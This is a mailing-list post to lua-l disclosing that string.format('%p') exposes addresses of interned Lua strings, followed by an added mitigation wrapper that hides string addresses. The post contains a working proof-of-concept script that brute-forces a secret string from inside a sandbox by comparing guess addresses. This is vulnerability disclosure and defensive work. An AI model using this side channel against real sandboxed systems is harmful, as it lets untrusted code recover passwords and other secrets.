From: Sergey Zakharchenko
Date: Fri, 23 Aug 2024 16:47:35 +0300
Message-ID:
Subject: string.format("%p", ) might be problematic
To: lua-l@googlegroups.com

Hello list,

[I've shared this with Roberto and he asked me to move the discussion to the mailing list].

Looks like the string pointer formatting functionality can be used to brute force (short) strings contained in an environment outside the sandbox. Those strings could be secret (and let's face it, many user passwords fit the Lua definition of a short string). I've looked through the mailing list discussions and I think there was some string.format("%p",...) pushback but haven't found this exact argument.

Consider the following, really naive code, runnable as a script and yielding the correct guess for me on x86-64 and MIPS 5.4.6 builds:

-- outside the sandbox
local secret = "bazfooquux"

-- somewhere inside the sandbox
-- allocate some memory to make a difference
local dummy_tbl = {}
for i=1,1000 do
  dummy_tbl[i] = string.format("%d",i)
end

local options = {"foo","bar","baz","quux"}
local answer_addr
local answer
for i1 = 1, #options do
  for i2 = 1, #options do
    for i3 = 1, #options do
      local guess = options[i1] .. options[i2] .. options[i3]
      local guess_addr = string.format("%p", guess)
      if not answer_addr or answer_addr > guess_addr then
        answer_addr = guess_addr
        answer = guess
      end
    end
  end
end
print("The secret is:", answer)

No other Lua type has the interning behaviour of strings, and regular code should have no business getting their addresses; I suggest that strings be dropped from the list of types handled by %p (and a null pointer representation, for numbers, should be returned instead).

Best regards,

-- 
DoubleF
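Until the interpreter itself stops handing out string addresses, a sandbox author can apply the same rule from the Lua side. The following is an added example, not code from the post or from the Lua project: a wrapper that rewrites any %p conversion whose argument is a string so that the address is never exposed, leaving %p intact for tables, functions and other reference types. The names safe_format and conversions are mine, and it assumes Lua 5.4, where %p on a value without an address prints "(null)".

```lua
local raw_format = string.format

-- Parse a Lua format string into its conversion characters, in argument
-- order. Specs look like '%' [flags] [width] ['.' precision] conversion;
-- '%%' is a literal percent sign and consumes no argument.
local function conversions(fmt)
  local convs, i = {}, 1
  while true do
    local s = fmt:find("%", i, true)
    if not s then break end
    if fmt:sub(s + 1, s + 1) == "%" then
      i = s + 2
    else
      local _, e, conv = fmt:find("^[%-%+ #0]*%d*%.?%d*(%a)", s + 1)
      if not conv then break end   -- malformed spec: string.format will reject it
      convs[#convs + 1] = conv
      i = e + 1
    end
  end
  return convs
end

-- Drop-in replacement for string.format: any %p whose argument is a string
-- gets a number instead, which has no address, so Lua 5.4 prints "(null)"
-- for it (the representation the post asks for). Other types keep %p.
-- Width and '-' flags on the spec are still honoured by the real formatter.
local function safe_format(fmt, ...)
  if type(fmt) ~= "string" then return raw_format(fmt, ...) end
  local args = table.pack(...)
  for idx, conv in ipairs(conversions(fmt)) do
    if conv == "p" and type(args[idx]) == "string" then
      args[idx] = 0
    end
  end
  return raw_format(fmt, table.unpack(args, 1, args.n))
end

-- Install before loading untrusted code. Patching the shared 'string' table
-- also covers the method form ("%p"):format(s), which resolves through it.
string.format = safe_format

-- Constructed values for a quick check in an interactive session.
local secret = "bazfooquux"
print(string.format("%p", secret))              -- string: address withheld
print(string.format("%-14p|%d", {}, 7))         -- table: address still shown
print(string.format("100%% done, %p", secret))  -- '%%' consumes no argument
```

Installing the wrapper on the real string table rather than on a per-sandbox copy matters: a sandbox that only replaces its own environment's string table still lets ("%p"):format(guess) reach the original function through the string metatable's __index. With this in place the brute-force loop from the post sees the same "(null)" for every guess and learns nothing from the ordering. It is a stopgap at the library layer; the change the post proposes in the C implementation is the real fix.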